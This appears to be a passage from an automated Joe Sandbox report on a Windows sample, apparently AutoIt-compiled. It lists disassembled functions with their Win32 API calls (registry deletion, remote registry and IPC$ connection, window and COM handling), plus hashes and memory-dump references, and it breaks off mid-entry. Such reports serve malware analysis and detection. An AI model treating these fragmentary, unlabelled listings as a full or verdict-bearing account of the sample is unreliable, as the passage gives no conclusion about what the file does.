                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          • Opcode ID: ba22e2253fd9043e17e20f629915dec01e6f329c80ec3ff74eae4f6cf254c7d2
                          • Instruction ID: 581bc6993fab5e6032b419e8dd6a50ca15eaebf048ff3206e75da2e0766ac547
                          • Opcode Fuzzy Hash: ba22e2253fd9043e17e20f629915dec01e6f329c80ec3ff74eae4f6cf254c7d2
                          • Instruction Fuzzy Hash: 2B314C72604205DFFB32AA79F849B56B7E9FF00310F154469E499E71A3DB39BC418B20
                          Function 0076365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetClassNameW.USER32(?,?,00000100), ref: 0076369C
                          • _wcslen.LIBCMT ref: 007636A7
                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00763797
                          • GetClassNameW.USER32(?,?,00000400), ref: 0076380C
                          • GetDlgCtrlID.USER32(?), ref: 0076385D
                          • GetWindowRect.USER32(?,?), ref: 00763882
                          • GetParent.USER32(?), ref: 007638A0
                          • ScreenToClient.USER32(00000000), ref: 007638A7
                          • GetClassNameW.USER32(?,?,00000100), ref: 00763921
                          • GetWindowTextW.USER32(?,?,00000400), ref: 0076395D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                          • String ID: %s%u
                          • API String ID: 4010501982-679674701
                          • Opcode ID: 5eaab1790170c02f8077d176cce1f3e3876a9e65615a508fdebacb44d40888ff
                          • Instruction ID: 88a184ffba92ce7d8498f8a033e4ef677703a80fa32b6a6d574f5d1ca037d8eb
                          • Opcode Fuzzy Hash: 5eaab1790170c02f8077d176cce1f3e3876a9e65615a508fdebacb44d40888ff
                          • Instruction Fuzzy Hash: FF919371204706EFD719DF24C885BEAB7A8FF44354F008619FD9AD2190DB38EA55CBA1
                          Function 00764954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                          Download Yara Rule
                          APIs
                          • GetClassNameW.USER32(?,?,00000400), ref: 00764994
                          • GetWindowTextW.USER32(?,?,00000400), ref: 007649DA
                          • _wcslen.LIBCMT ref: 007649EB
                          • CharUpperBuffW.USER32(?,00000000), ref: 007649F7
                          • _wcsstr.LIBVCRUNTIME ref: 00764A2C
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00764A64
                          • GetWindowTextW.USER32(?,?,00000400), ref: 00764A9D
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00764AE6
                          • GetClassNameW.USER32(?,?,00000400), ref: 00764B20
                          • GetWindowRect.USER32(?,?), ref: 00764B8B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                          • String ID: ThumbnailClass
                          • API String ID: 1311036022-1241985126
                          • Opcode ID: 7ad4d749dc0c4046a8bca27b1017e0a28f047682d8e6eb4ab952541f2177672b
                          • Instruction ID: 86d03eebc15da39a27ca0d35f02c1b3e2959f3b8b00e676283d390ba39f4837d
                          • Opcode Fuzzy Hash: 7ad4d749dc0c4046a8bca27b1017e0a28f047682d8e6eb4ab952541f2177672b
                          • Instruction Fuzzy Hash: 6391BC71004205EFDB05DF14C989FAA77E8FF84314F04846AFD8A9A196DB38ED46CBA1
                          Function 00798D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00798D5A
                          • GetFocus.USER32 ref: 00798D6A
                          • GetDlgCtrlID.USER32(00000000), ref: 00798D75
                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00798E1D
                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00798ECF
                          • GetMenuItemCount.USER32(?), ref: 00798EEC
                          • GetMenuItemID.USER32(?,00000000), ref: 00798EFC
                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00798F2E
                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00798F70
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00798FA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                          • String ID: 0
                          • API String ID: 1026556194-4108050209
                          • Opcode ID: 3cf1328476bef059254a96c896449a72009738f849412a114c0942bc1c694d02
                          • Instruction ID: 456dc8fa632b2a797d6d7bf599bca3e5dae6328016d4f95f78b4bf7037b6b62b
                          • Opcode Fuzzy Hash: 3cf1328476bef059254a96c896449a72009738f849412a114c0942bc1c694d02
                          • Instruction Fuzzy Hash: 6681E271508301AFDF51CF24E888EAB7BEAFB8A314F14051EF99597291DB38D901CB62
                          Function 0076DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                          Download Yara Rule
                          APIs
                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0076DC20
                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0076DC46
                          • _wcslen.LIBCMT ref: 0076DC50
                          • _wcsstr.LIBVCRUNTIME ref: 0076DCA0
                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0076DCBC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                          • API String ID: 1939486746-1459072770
                          • Opcode ID: d37117a6b7c185f2f1a371b851b292eaa9d722b8c433010899fd7ecd40fe3caa
                          • Instruction ID: 7a8a1816c15e08d22dd42b023ad66f3ba20c6409ca25fbe0d9801f5dd6c6d5bb
                          • Opcode Fuzzy Hash: d37117a6b7c185f2f1a371b851b292eaa9d722b8c433010899fd7ecd40fe3caa
                          • Instruction Fuzzy Hash: F641F6B2A40215BADB21A774AC4BEFF77ACEF45710F14406AF901A61C2EB7C9D0186A4
                          Function 0078CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0078CC64
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0078CC8D
                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0078CD48
                            • Part of subcall function 0078CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0078CCAA
                            • Part of subcall function 0078CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0078CCBD
                            • Part of subcall function 0078CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0078CCCF
                            • Part of subcall function 0078CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0078CD05
                            • Part of subcall function 0078CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0078CD28
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0078CCF3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 2734957052-4033151799
                          • Opcode ID: 7a634c5ab9a05a98cc622751e8e5a5b459dd47d986792532cb47ed055b803af5
                          • Instruction ID: 111760810ec4e6fa4a6a6e7e516eef06427ae2230743fde3b58bfa0734241d79
                          • Opcode Fuzzy Hash: 7a634c5ab9a05a98cc622751e8e5a5b459dd47d986792532cb47ed055b803af5
                          • Instruction Fuzzy Hash: 663180B1A41128BBDB22AB55DC88EFFBB7CEF05740F004166A905E7140DA389A46DBB4
                          Function 0076E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • timeGetTime.WINMM ref: 0076E6B4
                            • Part of subcall function 0071E551: timeGetTime.WINMM(?,?,0076E6D4), ref: 0071E555
                          • Sleep.KERNEL32(0000000A), ref: 0076E6E1
                          • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0076E705
                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0076E727
                          • SetActiveWindow.USER32 ref: 0076E746
                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0076E754
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0076E773
                          • Sleep.KERNEL32(000000FA), ref: 0076E77E
                          • IsWindow.USER32 ref: 0076E78A
                          • EndDialog.USER32(00000000), ref: 0076E79B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                          • String ID: BUTTON
                          • API String ID: 1194449130-3405671355
                          • Opcode ID: 19437b723f9e7415a491e68c19b8597da75905dfbded1df828c175617b7f345b
                          • Instruction ID: 86521310e75472d10a3aacb3a94c598b13e2291801384432592317a5c0d57fbe
                          • Opcode Fuzzy Hash: 19437b723f9e7415a491e68c19b8597da75905dfbded1df828c175617b7f345b
                          • Instruction Fuzzy Hash: 022181B5241304AFEF025F64EC89A253B79FB64748B10C426F902825A2DB7DAC16DB3C
                          Function 0076E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0076EA5D
                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0076EA73
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0076EA84
                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0076EA96
                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0076EAA7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: SendString$_wcslen
                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                          • API String ID: 2420728520-1007645807
                          • Opcode ID: 32bf0528ca0399e1d5f956f3973705c83eaf41e506e144a62041ca8bfbc1a601
                          • Instruction ID: 1b06f77cd8ed26d46f3f078b746994d8739d41fab34daca6f82c9fbfe2a82369
                          • Opcode Fuzzy Hash: 32bf0528ca0399e1d5f956f3973705c83eaf41e506e144a62041ca8bfbc1a601
                          • Instruction Fuzzy Hash: 3711C6B5A50219B9D720A7A5DD8AEFF6BBCEFD1F00F00452D7801A20D1EE785D05C6B0
                          Function 00765CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,00000001), ref: 00765CE2
                          • GetWindowRect.USER32(00000000,?), ref: 00765CFB
                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00765D59
                          • GetDlgItem.USER32(?,00000002), ref: 00765D69
                          • GetWindowRect.USER32(00000000,?), ref: 00765D7B
                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00765DCF
                          • GetDlgItem.USER32(?,000003E9), ref: 00765DDD
                          • GetWindowRect.USER32(00000000,?), ref: 00765DEF
                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00765E31
                          • GetDlgItem.USER32(?,000003EA), ref: 00765E44
                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00765E5A
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00765E67
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$ItemMoveRect$Invalidate
                          • String ID:
                          • API String ID: 3096461208-0
                          • Opcode ID: 4babd95a4254937885d0274ba4a16721c15a5c8cb2758d631b0cef12ea9c3588
                          • Instruction ID: a622660c45ede114d2f34288fe987b44184b74b92518ee6c3db82a36740186a3
                          • Opcode Fuzzy Hash: 4babd95a4254937885d0274ba4a16721c15a5c8cb2758d631b0cef12ea9c3588
                          • Instruction Fuzzy Hash: F8511171B00605AFDF19CF68DD89AAE7BB5FB48300F548229F916E7290D7749E01CB60
                          Function 00718BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00718F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00718BE8,?,00000000,?,?,?,?,00718BBA,00000000,?), ref: 00718FC5
                          • DestroyWindow.USER32(?), ref: 00718C81
                          • KillTimer.USER32(00000000,?,?,?,?,00718BBA,00000000,?), ref: 00718D1B
                          • DestroyAcceleratorTable.USER32(00000000), ref: 00756973
                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00718BBA,00000000,?), ref: 007569A1
                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00718BBA,00000000,?), ref: 007569B8
                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00718BBA,00000000), ref: 007569D4
                          • DeleteObject.GDI32(00000000), ref: 007569E6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                          • String ID:
                          • API String ID: 641708696-0
                          • Opcode ID: fa1c54e7f7c7c4b438f07043b6adebd4f5a2d5bb6cab5ee3239166efe93bf043
                          • Instruction ID: 926795d4334a65c4c65f857a64f03dc7c57b55b70759ba9c91666d7b05c07324
                          • Opcode Fuzzy Hash: fa1c54e7f7c7c4b438f07043b6adebd4f5a2d5bb6cab5ee3239166efe93bf043
                          • Instruction Fuzzy Hash: F661AC30502600EFCB629F18D958BA577F2FB40312F94855EE4429B5A0CB7DB9C5CFAA
                          Function 00719838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00719944: GetWindowLongW.USER32(?,000000EB), ref: 00719952
                          • GetSysColor.USER32(0000000F), ref: 00719862
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ColorLongWindow
                          • String ID:
                          • API String ID: 259745315-0
                          • Opcode ID: 62a85e8faff2c4f906e914aa6e2971783f75e286a672e360a4f6bd711bf613a0
                          • Instruction ID: 24f4d7fbb394ccaee313e8a51af656b71843643a6e8db4cefef2649b63a624ea
                          • Opcode Fuzzy Hash: 62a85e8faff2c4f906e914aa6e2971783f75e286a672e360a4f6bd711bf613a0
                          • Instruction Fuzzy Hash: 0D419E31104644AFDF219B3C9C98BF93BA5AB46321F148606FAA28B1E1D6789C83DB14
                          Function 007696E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0074F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00769717
                          • LoadStringW.USER32(00000000,?,0074F7F8,00000001), ref: 00769720
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0074F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00769742
                          • LoadStringW.USER32(00000000,?,0074F7F8,00000001), ref: 00769745
                          • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00769866
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString$Message_wcslen
                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                          • API String ID: 747408836-2268648507
                          • Opcode ID: 3e00327f07c80c5ccbaebca368b18985bd0f12d7fee9d70bbb906dd3e221266f
                          • Instruction ID: 26db274c84819ea8eb4ccda4237c5c9c7596fd87550abecee272c4af6ba117c7
                          • Opcode Fuzzy Hash: 3e00327f07c80c5ccbaebca368b18985bd0f12d7fee9d70bbb906dd3e221266f
                          • Instruction Fuzzy Hash: D8412072800209EADF05EBE0DD8ADEEB7BCAF55340F504165F606720D2EA396F49CB61
                          Function 007606DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007607A2
                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007607BE
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007607DA
                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00760804
                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0076082C
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00760837
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0076083C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                          • API String ID: 323675364-22481851
                          • Opcode ID: ed1a45b6b3e988da6ed056bc5b381f28615700eb3d8c536e5c8b7d052a299914
                          • Instruction ID: 23cc874d35b3c49e411c822c83072b33a7bd24aa61e1ec7bd50991b0f9a792e4
                          • Opcode Fuzzy Hash: ed1a45b6b3e988da6ed056bc5b381f28615700eb3d8c536e5c8b7d052a299914
                          • Instruction Fuzzy Hash: 19410B71C10229EBDF15EB94DC99DEEB7B8FF04350F144269E905A31A1EB386E44CB90
                          Function 00783C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00783C5C
                          • CoInitialize.OLE32(00000000), ref: 00783C8A
                          • CoUninitialize.OLE32 ref: 00783C94
                          • _wcslen.LIBCMT ref: 00783D2D
                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00783DB1
                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00783ED5
                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00783F0E
                          • CoGetObject.OLE32(?,00000000,0079FB98,?), ref: 00783F2D
                          • SetErrorMode.KERNEL32(00000000), ref: 00783F40
                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00783FC4
                          • VariantClear.OLEAUT32(?), ref: 00783FD8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                          • String ID:
                          • API String ID: 429561992-0
                          • Opcode ID: 4089a738dba264a7b29e23a4d86ee9617e83799a9085c9141c79672babe73d5a
                          • Instruction ID: 7d4fda29b5a8c922baa35e0005afab68f118c7d9333ecde121f3a3ecb6a2ee4c
                          • Opcode Fuzzy Hash: 4089a738dba264a7b29e23a4d86ee9617e83799a9085c9141c79672babe73d5a
                          • Instruction Fuzzy Hash: 23C13771608205DFD700EF68C88492BB7E9FF89B44F04491DF98A9B251D735ED45CBA2
                          Function 00777A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                          Download Yara Rule
                          APIs
